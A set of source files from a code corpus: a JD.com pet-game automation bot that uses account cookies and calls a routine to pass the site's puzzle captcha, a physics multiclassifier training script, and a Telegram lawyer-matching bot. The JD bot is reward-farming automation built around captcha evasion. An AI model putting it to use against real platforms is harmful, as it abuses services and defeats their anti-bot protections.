'H0001': # 需要拼图验证\n println('{}, 需要进行拼图验证!'.format(self._pt_pin))\n is_success = await self.validate()\n if is_success:\n return await self.request(session, path, body, method)\n return data\n\n except Exception as e:\n println('{}, 获取服务器数据失败:{}'.format(self._pt_pin, e.args))\n return {\n 'errorCode': 9999\n }\n\n async def sign_every_day(self, session, task):\n \"\"\"\n 每日签到\n \"\"\"\n println('{}, 签到功能暂时未完成!'.format(self._pt_pin))\n\n async def get_award(self, session, task):\n \"\"\"\n 领取任务奖励狗粮\n \"\"\"\n path = 'pet/getFood'\n body = {\n 'taskType': task['taskType']\n }\n data = await self.request(session, path, body)\n\n if not data or (data['errorCode'] and 'fail' in data['errorCode']):\n println('{}, 领取任务: 《{}》 奖励失败!'.format(self._pt_pin, task['taskName']))\n else:\n println('{}, 成功领取任务: 《{}》 奖励!'.format(self._pt_pin, task['taskName']))\n\n async def scan_market(self, session, task):\n \"\"\"\n 逛会场\n \"\"\"\n market_list = task['scanMarketList']\n path = 'pet/scan'\n for market in market_list:\n market_link = market['marketLink']\n if market_link == '':\n market_link = market['marketLinkH5']\n params = {\n 'marketLink': market_link,\n 'taskType': task['taskType']\n }\n data = await self.request(session, path, params, method='POST')\n if not data or (data['errorCode'] and 'success' not in data['errorCode']):\n println('{}, 无法完成逛会场任务:{}!'.format(self._pt_pin, market['marketName']))\n else:\n println('{}, 成功完成逛会场任务:{}!'.format(self._pt_pin, market['marketName']))\n await asyncio.sleep(3)\n\n async def follow_shop(self, session, task):\n \"\"\"\n 关注店铺\n \"\"\"\n click_path = 'pet/icon/click'\n shop_list = task['followShops']\n for shop in shop_list:\n click_params = {\n 'iconCode': 'follow_shop',\n 'linkAddr': shop['shopId']\n }\n await self.request(session, 
click_path, click_params)\n await asyncio.sleep(0.5)\n\n follow_path = 'pet/followShop'\n follow_params = {\n 'shopId': shop['shopId']\n }\n data = await self.request(session, follow_path, follow_params, post_type='body', method='POST')\n if not data or 'success' not in data:\n println('{}, 无法关注店铺{}'.format(self._pt_pin, shop['name']))\n else:\n println('{}, 成功关注店铺: {}'.format(self._pt_pin, shop['name']))\n await asyncio.sleep(1)\n\n async def follow_good(self, session, task):\n \"\"\"\n 关注商品\n \"\"\"\n path = 'pet/icon/click'\n good_list = task['followGoodList']\n\n for good in good_list:\n params = {\n 'iconCode': 'follow_good',\n 'linkAddr': good['sku']\n }\n await self.request(session, path, params)\n await asyncio.sleep(1)\n\n follow_path = 'pet/followGood'\n params = {\n 'sku': good['sku']\n }\n data = await self.request(session, follow_path, params, method='POST', post_type='form')\n if not data:\n println('{}, 关注商品:{}失败!'.format(self._pt_pin, good['skuName']))\n else:\n println('{}, 成功关注商品:{}!'.format(self._pt_pin, good['skuName']))\n\n async def follow_channel(self, session, task):\n \"\"\"\n \"\"\"\n channel_path = 'pet/getFollowChannels'\n channel_list = await self.request(session, channel_path)\n if not channel_list:\n println('{}, 获取频道列表失败!'.format(self._pt_pin))\n return\n\n for channel in channel_list:\n if channel['status']:\n continue\n click_path = 'pet/icon/click'\n click_params = {\n 'iconCode': 'follow_channel',\n 'linkAddr': channel['channelId']\n }\n await self.request(session, click_path, click_params)\n follow_path = 'pet/scan'\n follow_params = {\n 'channelId': channel['channelId'],\n 'taskType': task['taskType']\n }\n data = await self.request(session, follow_path, follow_params, method='POST')\n await asyncio.sleep(0.5)\n if not data or (\n data['errorCode'] and 'success' not in data['errorCode'] and 'repeat' not in data['errorCode']):\n println('{}, 关注频道:{}失败!'.format(self._pt_pin, channel['channelName']))\n else:\n println('{}, 成功关注频道:{}!'.format(self._pt_pin, channel['channelName']))\n await asyncio.sleep(3.1)\n\n async def do_task(self, session):\n \"\"\"\n 做任务\n :return:\n \"\"\"\n path = 'pet/getPetTaskConfig'\n task_list = await self.request(session, path)\n if not task_list:\n println('{}, 获取任务列表失败!'.format(self._pt_pin))\n return\n\n for task in task_list:\n if task['receiveStatus'] == 'unreceive':\n await self.get_award(session, task)\n await asyncio.sleep(1)\n\n if task['joinedCount'] and task['joinedCount'] >= task['taskChance']:\n println('{}, 任务:{}今日已完成!'.format(self._pt_pin, task['taskName']))\n continue\n\n if task['taskType'] == 'SignEveryDay':\n await self.sign_every_day(session, task)\n\n elif task['taskType'] == 'FollowGood': # 关注商品\n await self.follow_good(session, task)\n\n elif task['taskType'] == 'FollowChannel': # 关注频道\n await self.follow_channel(session, task)\n\n elif task['taskType'] == 'FollowShop': # 关注店铺\n await self.follow_shop(session, task)\n\n elif task['taskType'] == 'ScanMarket': # 逛会场\n await self.scan_market(session, task)\n\n async def get_friend_list(self, session, page=1):\n \"\"\"\n 获取好友列表\n \"\"\"\n path = 'pet/h5/getFriends'\n params = {\n 'itemsPerPage': 20,\n 'currentPage': page\n }\n friend_list = await self.request(session, path, params)\n if not friend_list:\n return []\n return friend_list\n\n async def help_friend_feed(self, session):\n \"\"\"\n 帮好友喂狗\n \"\"\"\n cur_page = 0\n while True:\n cur_page += 1\n friend_list = await self.get_friend_list(session, page=cur_page)\n if not friend_list:\n break\n\n for 
friend in friend_list:\n if friend['status'] == 'chance_full':\n println('{}, 今日帮好友喂狗次数已用完成!'.format(self._pt_pin))\n return\n\n if friend['status'] != 'not_feed':\n continue\n\n feed_path = 'pet/helpFeed'\n feed_params = {\n 'friendPin': friend['friendPin']\n }\n data = await self.request(session, feed_path, feed_params)\n if data and data['errorCode'] and 'ok' in data['errorCode']:\n println('{}, 成功帮好友:{} 喂狗!'.format(self._pt_pin, friend['friendName']))\n else:\n println(data)\n await asyncio.sleep(1)\n await asyncio.sleep(0.5)\n\n async def joy_race(self, session, level=2):\n \"\"\"\n 参与赛跑\n \"\"\"\n click_path = 'pet/icon/click'\n click_params = {\n 'iconCode': 'race_match',\n }\n await self.request(session, click_path, click_params)\n await asyncio.sleep(0.5)\n\n match_path = 'pet/combat/match'\n match_params = {\n 'teamLevel': level\n }\n\n for i in range(10):\n data = await self.request(session, match_path, match_params)\n if data['petRaceResult'] == 'participate':\n println('{}, 成功参与赛跑!'.format(self._pt_pin))\n return\n await asyncio.sleep(1)\n println('{}, 无法参与赛跑!'.format(self._pt_pin))\n\n async def run(self):\n async with aiohttp.ClientSession(headers=self.headers, cookies=self._aiohttp_cookies,\n json_serialize=ujson.dumps) as session:\n await self.joy_race(session)\n await self.help_friend_feed(session)\n await self.do_task(session)\n\n if self.browser:\n await self.browser.close()\n\n\ndef start(pt_pin, pt_key):\n \"\"\"\n 宠汪汪做任务\n \"\"\"\n app = JdJoy(pt_pin, pt_key)\n asyncio.run(app.run())\n\n\nif __name__ == '__main__':\n from utils.process import process_start\n from config import JOY_PROCESS_NUM\n process_start(start, '宠汪汪做任务', process_num=JOY_PROCESS_NUM)\n","sub_path":"jd_joy.py","file_name":"jd_joy.py","file_ext":"py","file_size_in_byte":19301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"602294532","text":"import os\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# data handling and numerical analysis\nimport uproot\nimport awkward as ak\nimport numpy as np\nimport pandas as pd\nfrom coffea import processor, hist\n\nimport scipy\n\n# Plotting / histogramming\nfrom yahist import Hist1D\nimport matplotlib.pyplot as plt\nimport mplhep\nplt.style.use(mplhep.style.CMS)\n\n# Machine learning packages\nimport tensorflow as tf\nfrom keras.utils import np_utils\nimport onnxruntime as rt\nfrom sklearn.utils import resample\nfrom sklearn.metrics import roc_curve, roc_auc_score, auc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, RobustScaler\nimport joblib\n\n# private modules and functions\nfrom Tools.dataCard import dataCard\nfrom Tools.helpers import finalizePlotDir, mt\nfrom Tools.limits import makeCardFromHist\nfrom processor.default_accumulators import dataset_axis\nfrom plots.helpers import makePlot\nfrom ML.multiclassifier_tools import get_one_hot, get_class_weight, get_sob,\\\n load_onnx_model, predict_onnx, dump_onnx_model,\\\n store_model, load_model,\\\n store_transformer, load_transformer\nfrom ML.models import baseline_model\n\n\ndef test_train(test, train, y_test, y_train, labels=[], bins=25, node=0, plot_dir=None, weight_test=None, weight_train=None):\n ks = {}\n\n fig, ax = plt.subplots(1,1,figsize=(10,10))\n\n h = {}\n for i, label in enumerate(labels):\n \n _ks, _p = scipy.stats.kstest(\n train[:,node][(y_train==i)],\n test[:,node][(y_test==i)]\n )\n \n ks[label] = (_p, _ks)\n\n h[label+'_test'] = Hist1D(test[:,node][(y_test==i)], 
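The slider-captcha solver in the jd_joy.py record above plans its drag as one large opening jump of roughly 60-80% of the measured offset, followed by small random nudges with random delays (and occasional left-right shakes), snapping straight to the target once a ~2 s time budget is spent. The standalone sketch below isolates that move-planning step; plan_slider_moves is a hypothetical helper written here for illustration and is not a function from the record itself.

import random

def plan_slider_moves(offset, max_total_delay_ms=2000):
    # Split a target pixel offset into human-looking (dx, delay_ms, steps)
    # segments whose dx values sum exactly to `offset`, mirroring the
    # strategy used in JdJoy.validate().
    moves = []
    remaining = offset
    total_delay = 0
    first = True
    while remaining > 0:
        if first:
            # opening jump of 60-80% of the full distance
            dx = min(int(random.randint(6, 8) / 10 * offset), remaining)
            first = False
        elif total_delay >= max_total_delay_ms:
            dx = remaining  # time budget spent: snap to the target
        else:
            dx = min(random.randint(5, 30), remaining)  # small human-like nudge
        remaining -= dx
        delay = random.randint(100, 500)  # pause between segments, as in the record
        total_delay += delay
        moves.append((dx, delay, random.randint(1, 20)))
    return moves

if __name__ == '__main__':
    print(plan_slider_moves(120))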
bins=bins, weights=weight_test[(y_test==i)]).normalize()\n h[label+'_train'] = Hist1D(train[:,node][(y_train==i)], bins=bins, label=label+' (p=%.2f, KS=%.2f)'%(_p, _ks), weights=weight_train[(y_train==i)]).normalize()\n \n\n h[label+'_test'].plot(color=colors[i], histtype=\"step\", ls='--', linewidth=2)\n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/score_node_{}.png\".format(plot_dir, node))\n fig.savefig(\"{}/score_node_{}.pdf\".format(plot_dir, node))\n \n return ks\n\n\ndef test_train_cat(test, train, y_test, y_train, labels=[], n_cat=5, plot_dir=None, weight_test=None, weight_train=None):\n ks = {}\n bins = [x-0.5 for x in range(n_cat+1)]\n \n fig, ax = plt.subplots(1,1,figsize=(10,10))\n \n h = {}\n for i, label in enumerate(labels):\n \n _ks, _p = scipy.stats.kstest(\n train.argmax(axis=1)[(y_train==i)],\n test.argmax(axis=1)[(y_test==i)]\n )\n\n ks[label] = (_p, _ks)\n \n h[label+'_test'] = Hist1D(test.argmax(axis=1)[(y_test==i)], bins=bins, weights=weight_test[(y_test==i)]).normalize()\n h[label+'_train'] = Hist1D(train.argmax(axis=1)[(y_train==i)], bins=bins, label=label+' (p=%.2f, KS=%.2f) train'%(_p, _ks), weights=weight_train[(y_train==i)]).normalize()\n\n h[label+'_test'].plot(color=colors[i], histtype=\"step\", ls='--', linewidth=2)\n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n \n ax.set_ylabel('a.u.')\n ax.set_xlabel('category')\n\n ax.set_ylim(0,1/n_cat*5)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/categories.png\".format(plot_dir))\n fig.savefig(\"{}/categories.pdf\".format(plot_dir))\n\n return ks\n\ndef get_cat_plot(X, y, labels=[], n_cat=5, plot_dir=None, weight=None):\n ks = {}\n bins = [x-0.5 for x in range(n_cat+1)]\n \n fig, ax = plt.subplots(1,1,figsize=(10,10))\n \n h = {}\n for i, label in enumerate(labels):\n \n h[label+'_train'] = Hist1D(X.argmax(axis=1)[(y==i)], bins=bins, label=label, weights=weight[(y==i)])\n \n h[label+'_train'].plot(color=colors[i], histtype=\"step\", linewidth=2)\n \n ax.set_ylabel('a.u.')\n ax.set_xlabel('category')\n\n ax.set_ylim(0,200)\n\n if plot_dir:\n finalizePlotDir(plot_dir)\n fig.savefig(\"{}/abs_categories.png\".format(plot_dir))\n fig.savefig(\"{}/abs_categories.pdf\".format(plot_dir))\n\n\ndef get_ROC(test, train, y_test, y_train, node=0):\n\n y_test_binary = (y_test!=node)*0 + (y_test==node)*1\n\n fpr_test, tpr_test, thresholds_test = roc_curve( y_test_binary, test[:,node] )\n auc_val_test = auc(fpr_test, tpr_test)\n\n plt.plot( tpr_test, 1-fpr_test, 'b', label= 'AUC NN (test)=' + str(round(auc_val_test,4) ))\n\n y_train_binary = (y_train!=node)*0 + (y_train==node)*1\n \n fpr_train, tpr_train, thresholds_test = roc_curve( y_train_binary, train[:,node] )\n auc_val_train = auc(fpr_train, tpr_train)\n\n plt.plot( tpr_train, 1-fpr_train, 'r', label= 'AUC NN (train)=' + str(round(auc_val_train,4) ))\n\n plt.xlabel('$\\epsilon_{Sig}$', fontsize = 20) # 'False positive rate'\n plt.ylabel('$1-\\epsilon_{Back}$', fontsize = 20) # '1-True positive rate' \n plt.legend(loc ='lower left')\n\n\nif __name__ == '__main__':\n\n\n import argparse\n\n argParser = argparse.ArgumentParser(description = \"Argument parser\")\n argParser.add_argument('--load', action='store_true', default=None, help=\"Load weights?\")\n argParser.add_argument('--cat', action='store_true', default=None, help=\"Use categories?\")\n argParser.add_argument('--fit', action='store_true', default=None, help=\"Do combine fit?\")\n 
argParser.add_argument('--version', action='store', default='trilep_v1', help=\"Version number\")\n argParser.add_argument('--year', action='store', default='2018', help=\"Which year?\")\n args = argParser.parse_args()\n\n\n load_weights = args.load\n version = \"_\".join([args.year, args.version])\n is_cat = args.cat\n\n plot_dir = os.path.expandvars(\"/home/users/$USER/public_html/tW_scattering/ML/%s/\"%version)\n\n # Load the input data.\n # This data frame is produced with the SS_analysis processor:\n # ipython -i SS_analysis.py -- --dump\n #df = pd.read_hdf('/hadoop/cms/store/user/dspitzba/ML/multiclass_input_2018_trilep_v2.h5')\n df = pd.read_hdf('../processor/multiclass_input_%s_trilep_v2.h5'%args.year)\n\n variables = [\n ## best results with all variables, but should get pruned at some point...\n 'n_jet',\n ##'n_central',\n 'n_fwd',\n 'n_b',\n 'n_tau', ## important for ttZ\n 'n_ele',\n 'n_sfos',\n 'charge',\n #'n_track', ## not so important, and very bad data/MC agreement\n 'st',\n 'lt',\n ##'ht',\n 'met',\n 'mjj_max',\n 'delta_eta_jj',\n 'lead_lep_pt',\n 'lead_lep_eta',\n 'sublead_lep_pt',\n 'sublead_lep_eta',\n 'trail_lep_pt',\n 'trail_lep_eta',\n 'm3l',\n 'close_mass',\n 'far_mass',\n 'dilepton_mass',\n 'dilepton_pt',\n 'fwd_jet_pt',\n 'fwd_jet_p',\n 'fwd_jet_eta',\n 'lead_jet_pt',\n 'sublead_jet_pt',\n 'lead_jet_eta',\n 'sublead_jet_eta',\n 'lead_btag_pt',\n 'sublead_btag_pt',\n 'lead_btag_eta',\n 'sublead_btag_eta',\n 'min_bl_dR',\n 'min_mt_lep_met',\n ]\n\n baseline = (df['n_fwd']>=0)\n #baseline = (df['n_fwd']>0)\n\n df['label_orig'] = df['label']\n\n # Take input dataframe, rearrange the categories, calculate the correct weights, and relabel\n # Signal is easy. Just take events that are in the SS category: df['SS']==1, passing the baseline selection\n # Assigned label: 0\n #df_signal = df[((df['label']==0)&(df['trilep']==1)&baseline)] # This is the UL samples\n df_signal = df[((df['label']==100)&(df['trilep']==1)&baseline)] # This is the old, large stats sample\n df_signal['label'] = np.ones(len(df_signal))*0\n\n # Non-resonant backgrounds from the various processes that contribute.\n # Assigned label: 1\n df_prompt = df[(((df['label']==1)|(df['label']==3)|(df['label']==5))&(df['trilep'])&baseline)] # every prompt background except ttbar (which shouldn't have prompt anyway)\n df_prompt['label'] = np.ones(len(df_prompt))*1\n\n # Resonant lepton backgrounds from the various processes that contribute.\n # Assigned label: 2\n df_resonant = df[(((df['label']==2)|(df['label']==6))&(df['trilep'])&baseline)]\n df_resonant['label'] = np.ones(len(df_resonant))*2\n\n # Nonprompt leptons, taken from top quark process (input label 4).\n # We use the data driven background estimate, so we use events from the AR region, and adjust the weight accordingly\n # Assigned label: 3\n df_NP = df[((df['label']==4)&(df['AR']==1)&baseline)]\n df_NP['weight'] = df_NP['weight']*df_NP['weight_np']\n df_NP['label'] = np.ones(len(df_NP))*3\n\n # Backgrounds with a photon in the final state (XG) from the various processes that contribute.\n # Assigned label: 4\n df_XG = df[((df['label']==7)&(df['trilep'])&baseline)]\n df_XG['label'] = np.ones(len(df_XG))*4\n\n # These data frames are currently not used in training, but just for visualizations\n df_TTW = df[(((df['label']==1)|(df['label']==3)|(df['label']==5))&(df['trilep']==1)&baseline)] # assume that rares (4-top, VVV) is prompt, too\n df_TTW['label'] = np.ones(len(df_TTW))\n df_TTZ = df[((df['label']==2)&(df['trilep']==1)&baseline)]\n df_TTH = 
df[((df['label']==3)&(df['trilep']==1)&baseline)]\n\n print ()\n print (\"Yields after training preselection (baseline selection):\")\n df_list = [\\\n ('signal', df_signal),\n ('TTW/TTH', df_TTW),\n ('TTZ', df_TTZ),\n ('TTH', df_TTH),\n ('nonresonant', df_prompt),\n ('resonant', df_resonant),\n ('nonprompt', df_NP),\n ('XG', df_XG),\n ]\n\n print (\"{:30}{:>10}{:>10}\".format(\"Name\", \"Weighted\", \"Raw\"))\n for name, df in df_list:\n print (\"{:30}{:10.2f}{:10}\".format(name, sum(df['weight']), len(df)))\n\n print ()\n\n # Now, merge all the separate dataframes into one again\n df_in = pd.concat([df_signal, df_prompt, df_resonant, df_NP])\n labels = df_in['label'].values\n df_train, df_test, y_train_int, y_test_int = train_test_split(df_in, labels, train_size= int( 0.9*labels.shape[0] ), random_state=42 )\n\n X_train = df_train[variables].values\n X_test = df_test[variables].values\n\n y_train = get_one_hot(y_train_int.astype(int))\n y_test = get_one_hot(y_test_int.astype(int))\n \n\n input_dim = len(variables)\n out_dim = len(y_train[0])\n\n # Adjust the weights of every category so that they have equal importance\n # FIXME: We can try to increase e.g. the importance of prompt or lost lepton backgrounds vs others by multiplying\n # their weight by a constant factor. get_class_weight is imported from ML.multiclassifier_tools\n class_weight = get_class_weight(df_train, dim=out_dim)\n\n '''\n # Can't use pipelines, unfortunately\n pipeline = Pipeline([\n ('scaler', RobustScaler()),\n ('NN', baseline_model()),\n ])\n '''\n\n if not load_weights:\n\n epochs = 100 # 50 -> 200\n batch_size = 5120\n validation_split = 0.2\n\n scaler = RobustScaler()\n X_train_scaled = scaler.fit_transform(X_train)\n params = scaler.get_params()\n\n model = baseline_model(input_dim, out_dim)\n\n history = model.fit(\n X_train_scaled,\n y_train,\n epochs = epochs,\n batch_size = batch_size,\n verbose = 0,\n class_weight = class_weight,\n sample_weight = df_train['weight'].values,\n )\n\n store_model(model, scaler, version=version)\n\n else:\n #model, scaler = load_model(version=version)\n model, scaler = load_onnx_model(version=version)\n\n X_train_scaled = scaler.transform(X_train)\n print (\"Loaded weights.\")\n\n X_all = df_in[variables].values\n\n X_all_scaled = scaler.transform(X_all)\n X_test_scaled = scaler.transform(X_test)\n\n # Evaluate the model for the entire data frame (pred_all), just the training set (pred_train) or the test set (pred_test)\n if not load_weights:\n pred_all = model.predict( X_all_scaled )\n pred_train = model.predict( X_train_scaled )\n pred_test = model.predict( X_test_scaled )\n else:\n # always use ONNX for inference\n pred_all = predict_onnx(model, X_all_scaled )\n pred_train = predict_onnx(model, X_train_scaled )\n pred_test = predict_onnx(model, X_test_scaled )\n\n # We can now evaluate the performance\n df_in['score_topW'] = pred_all[:,0]\n df_in['score_prompt'] = pred_all[:,1]\n df_in['score_ll'] = pred_all[:,2]\n df_in['score_np'] = pred_all[:,3]\n #df_in['score_cf'] = pred_all[:,4]\n df_in['score_best'] = pred_all.argmax(axis=1)\n\n # For quantile transformation on the top-W node:\n from sklearn.preprocessing import QuantileTransformer\n qt = QuantileTransformer(n_quantiles=40, random_state=0)\n qt.fit(df_in[((df_in['label']==0)&(df_in['score_best']==0))]['score_topW'].values.reshape(-1, 1))\n \n store_transformer(qt, version=version)\n\n df_in['score_topW_transform'] = qt.transform(df_in['score_topW'].values.reshape(-1, 1))\n df_in['score_prompt_transform'] = 
qt.transform(df_in['score_prompt'].values.reshape(-1, 1))\n\n for i in range(3):\n print (\"Checking assignment for cat %s\"%i)\n for x in range(5):\n print (x, round(sum(df_in[((df_in['trilep']==1)&(df_in['label']==i)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['trilep']==1)&(df_in['label']==i))]['weight']), 3))\n\n print (\"NP assignment\")\n for x in range(5):\n print (x, round(sum(df_in[((df_in['AR']==1)&(df_in['label']==3)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['AR']==1)&(df_in['label']==3))]['weight']), 3))\n\n #print (\"XG assignment\")\n #for x in range(5):\n # print (x, round(sum(df_in[((df_in['trilep']==1)&(df_in['label']==4)&(df_in['score_best']==x))]['weight'])/sum(df_in[((df_in['trilep']==1)&(df_in['label']==4))]['weight']), 3))\n\n def get_bkg(x):\n bkg = sum(df_in[((df_in['trilep']==1)&(df_in['label']==1)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['trilep']==1)&(df_in['label']==2)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['AR']==1)&(df_in['label']==3)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight']) + \\\n sum(df_in[((df_in['trilep']==1)&(df_in['label']==4)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight'])\n return bkg\n\n def get_sig(x):\n return sum(df_in[((df_in['trilep']==1)&(df_in['label']==0)&(df_in['score_best']==0)&(df_in['score_topW']>x))]['weight'])\n\n print (\"Signal yield in node 0: %.2f\"%get_sig(0))\n print (\"Baseline S/b: %.3f\"%(get_sig(0)/get_bkg(0)))\n\n # find the cut where there are only 9 bkg events left (arbitrary threshold)\n for i in range(0, 500, 1):\n bkg = get_bkg(i/500)\n if bkg < 9:\n break\n thresh = i/500\n \n print (\"S/B for bkg=9: %.3f\"%(get_sig(thresh)/get_bkg(thresh)))\n\n for i in range(0, 500, 1):\n sig = get_sig(i/500)\n if sig < 1:\n break\n thresh = i/500\n \n print (\"S/B for sig=1: %.3f\"%(get_sig(thresh)/get_bkg(thresh)))\n\n\n print (\"Checking for overtraining in max node asignment...\")\n\n colors = ['gray', 'blue', 'red', 'green', 'orange']\n hist_labels = ['top-W', 'nonresonant', 'resonant', 'NP']\n\n ks = test_train_cat(\n pred_test,\n pred_train,\n y_test_int,\n y_train_int,\n labels = hist_labels,\n n_cat = len(hist_labels),\n plot_dir = plot_dir,\n weight_test = df_test['weight'].values,\n weight_train = df_train['weight'].values,\n )\n\n for label in ks:\n if ks[label][0]<0.05:\n print (\"- !! Found small p-value for process %s: %.2f\"%(label, ks[label][0]))\n\n\n get_cat_plot(\n pred_all,\n df_in['label'].values,\n labels = hist_labels,\n n_cat = len(hist_labels),\n plot_dir = plot_dir,\n weight = df_in['weight'].values,\n )\n\n print (\"Checking for overtraining in the different nodes...\")\n\n bins = [x/20 for x in range(21)]\n\n for node in [0,1,2,3]:\n ks = test_train(\n pred_test,\n pred_train,\n y_test_int,\n y_train_int,\n labels=hist_labels,\n node=node,\n bins=bins,\n plot_dir=plot_dir,\n weight_test = df_test['weight'].values,\n weight_train = df_train['weight'].values,\n )\n for label in ks:\n if ks[label][0]<0.05:\n print (\"- !! 
Found small p-value for process %s in node %s: %.2f\"%(label, node, ks[label][0]))\n\n\n if not load_weights:\n dump_onnx_model(model, version=version)\n\n # Correlations\n from ML.multiclassifier_tools import get_correlation_matrix\n get_correlation_matrix(\n df_in[(df_in['label']==0)][(variables+['score_topW', 'score_prompt', 'score_ll', 'score_np'])], \n f_out=plot_dir+'/correlation.png'\n )\n \n # make this a function for two histograms with ratio, for a certain binning\n\n def shape_comparison(array1, array2, bins=20, weight1=[], weight2=[], normalize=True, labels=[\"first\", \"second\"], save=False):\n\n import mplhep as hep\n plt.style.use(hep.style.CMS)\n\n hist1 = Hist1D(array1, bins=np.arange(0,bins+1)/bins, weights=weight1)\n hist2 = Hist1D(array2, bins=np.arange(0,bins+1)/bins, weights=weight2)\n\n if normalize:\n hist1 = hist1.normalize()\n hist2 = hist2.normalize()\n\n ratio = hist1.divide(hist2)\n \n fig, (ax, rax) = plt.subplots(2,1,figsize=(10,10), gridspec_kw={\"height_ratios\": (3, 1), \"hspace\": 0.05}, sharex=True)\n\n hep.cms.label(\n \"Preliminary\",\n data=False,\n lumi=60.0,\n loc=0,\n ax=ax,\n )\n \n hep.histplot(\n [ hist1.counts, hist2.counts ],\n hist1.edges,\n w2=[ hist1.errors**2, hist2.errors**2 ],\n histtype=\"step\",\n stack=False,\n label=labels,\n ax=ax)\n\n hep.histplot(\n ratio.counts,\n ratio.edges,\n w2=ratio.errors,\n histtype=\"errorbar\",\n color='black',\n ax=rax)\n\n rax.set_ylim(0,1.99)\n rax.set_xlabel(r'$score$')\n rax.set_ylabel(r'Ratio')\n ax.set_ylabel(r'Events')\n \n #add_uncertainty(total_mc, rax, ratio=True)\n #add_uncertainty(total_mc, ax)\n \n ax.legend()\n \n plt.show()\n \n if save:\n fig.savefig(\"{}.png\".format(save))\n fig.savefig(\"{}.pdf\".format(save))\n\n shape_comparison(\n df_in[((df_in['label']==0)&(df_in['score_best']==0))]['score_topW_transform'].values,\n df_in[((df_in['label']==1)&(df_in['score_best']==0))]['score_topW_transform'].values,\n bins=8,\n weight1=df_in[((df_in['label']==0)&(df_in['score_best']==0))]['weight'].values,\n weight2=df_in[((df_in['label']==1)&(df_in['score_best']==0))]['weight'].values,\n normalize = False,\n save = \"{}/score_transformed\".format(plot_dir),\n )\n","sub_path":"ML/multiclassifier_trilep.py","file_name":"multiclassifier_trilep.py","file_ext":"py","file_size_in_byte":19408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"79600900","text":"import telebot as tb\r\nfrom telebot import apihelper\r\nimport re\r\nimport json\r\n\r\nip = '157.245.11.180'\r\nport = '3128'\r\n\r\napihelper.proxy = {\r\n 'https': 'https://{}:{}'.format(ip, port)\r\n}\r\n\r\n\r\ndef create_bot(api):\r\n bot = tb.TeleBot(api)\r\n\r\n @bot.message_handler(commands=['start'])\r\n def start(message):\r\n with open('lawyers.json', 'r') as f:\r\n data = json.load(f)\r\n f.close()\r\n\r\n if {\"user_id\": message.chat.id} in data:\r\n bot.send_message(message.chat.id, \"Ты уже в системе!\")\r\n return\r\n\r\n with open('lawyers.json', 'w') as f:\r\n data.append({'user_id': message.chat.id})\r\n json.dump(data, f)\r\n\r\n del data\r\n f.close()\r\n\r\n bot.send_message(message.chat.id, \"Добро пожаловать!\")\r\n\r\n @bot.message_handler(commands=['send'])\r\n def get_text(message):\r\n user_rep = tb.types.ForceReply()\r\n msg = bot.send_message(message.from_user.id, \"Текст заявки:\", reply_markup=user_rep)\r\n\r\n bot.register_next_step_handler(msg, send_text)\r\n\r\n def send_text(msg):\r\n keyboard = tb.types.InlineKeyboardMarkup()\r\n send_to_customer = 
tb.types.InlineKeyboardButton(text=\"Ответить\", callback_data=f\"send_to_customer:{msg.from_user.id}\")\r\n refuse_to_customer = tb.types.InlineKeyboardButton(text=\"Отказаться\", callback_data=f\"refuse_to_customer:{msg.from_user.id}\")\r\n\r\n keyboard.add(send_to_customer, refuse_to_customer)\r\n\r\n with open('lawyers.json', 'r') as f:\r\n users = json.load(f)\r\n f.close()\r\n for user in users:\r\n if user['user_id'] != msg.from_user.id:\r\n bot.send_message(user['user_id'], msg.text, reply_markup=keyboard)\r\n else:\r\n bot.send_message(msg.from_user.id, 'Вопрос был отправлен')\r\n\r\n del users\r\n\r\n @bot.callback_query_handler(func=lambda call: 'refuse_to_customer' in call.data)\r\n def handler_login(call):\r\n bot.delete_message(call.message.chat.id, call.message.message_id)\r\n\r\n @bot.callback_query_handler(func=lambda call: 'send_to_customer' in call.data)\r\n def handler_login(call):\r\n customers_text = call.message.text\r\n client_id = re.findall(r'\\d+', call.data)\r\n user_rep = tb.types.ForceReply()\r\n msg = bot.send_message(call.message.chat.id, \"Сделать предложение:\", reply_markup=user_rep)\r\n\r\n bot.register_next_step_handler(msg, send_request, client_id[-1], customers_text)\r\n\r\n def send_request(msg, client_id, customers_text):\r\n keyboard = tb.types.InlineKeyboardMarkup()\r\n accept_request = tb.types.InlineKeyboardButton(text=\"📝 Заполнить\",callback_data=f\"accept_request:{msg.from_user.id}\")\r\n\r\n keyboard.add(accept_request)\r\n\r\n bot.send_message(client_id, f'{customers_text}\\n\\n⬇️\\n--------------------\\nПредложение от юриста:\\n\\n'\r\n f'{msg.text}\\n\\n--------------------\\nЗаполните данные, чтобы с вами связались! '\r\n f'(Если вы допустили ошибку нажмите на кнопку, и заполните информацию вновь.)',\r\n reply_markup=keyboard, parse_mode='HTML')\r\n\r\n @bot.callback_query_handler(func=lambda call: 'accept_request' in call.data)\r\n def get_city(call):\r\n justiva_id = re.findall(r'\\d+', call.data)\r\n print(justiva_id)\r\n order = call.message.text\r\n order = order[0: order.find(\"\\n\\n\") + 1]\r\n data = list()\r\n\r\n msg = bot.send_message(call.message.chat.id, \"Введите свой 🏙️ город:\")\r\n\r\n bot.register_next_step_handler(msg, get_name, data, order, justiva_id)\r\n\r\n def get_name(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 👤 имя:\")\r\n\r\n bot.register_next_step_handler(msg, get_price, data, order, justiva_id)\r\n\r\n def get_price(msg, data, order, justiva_id):\r\n data.append(msg.text)\r\n\r\n msg = bot.send_message(msg.chat.id, \"Введите свое 💰 цена:\")\r\n\r\n bot.register_next_step_handler(msg, 